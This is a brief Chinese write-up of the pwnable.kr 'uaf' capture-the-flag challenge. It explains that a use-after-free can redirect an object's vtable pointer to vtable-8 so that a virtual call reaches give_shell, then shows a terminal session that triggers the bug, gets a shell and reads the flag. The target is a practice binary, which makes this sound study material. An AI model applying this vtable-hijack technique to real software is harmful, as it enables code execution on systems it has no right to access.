[Toddler's Bottle]-uaf

  • 程序通過指向vtable的指針+8來調(diào)用introduce()函數(shù),所以我們可以通過uaf來更改原本指向vtable的指針為vtable-8處,這樣當(dāng)執(zhí)行vtable+8時就會執(zhí)行g(shù)ive_shell函數(shù)

payload:

uaf@ubuntu:/tmp/hacker_mao$ ./uaf 16 file
1. use
2. after
3. free
3
1. use
2. after
3. free
2
your data is allocated
1. use
2. after
3. free
2
your data is allocated
1. use
2. after
3. free
1
$ cat /home/uaf/flag
yay_f1ag_aft3r_pwning
$
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • Mommy, what is Use After Free bug? ssh uaf@pwnable.kr -p2...
    Umiade閱讀 691評論 0 0
  • 1.C和C++的區(qū)別?C++的特性?面向?qū)ο缶幊痰暮锰帲?答:c++在c的基礎(chǔ)上增添類,C是一個結(jié)構(gòu)化語言,它的重...
    杰倫哎呦哎呦閱讀 10,005評論 0 45
  • 一、/*分糖果 問題描述有n個小朋友圍坐成一圈。老師給每個小朋友隨機發(fā)偶數(shù)個糖果,然后進行下面的游戲:每個小朋友都...
    逍遙_9353閱讀 786評論 1 1
  • 題記:獻給所有疲于奔命、迷途難返,脫不開又放不下的靈魂。 一個好的事物,不會唯我獨尊,但她可以像春...
    行修閱讀 585評論 1 3

友情鏈接更多精彩內(nèi)容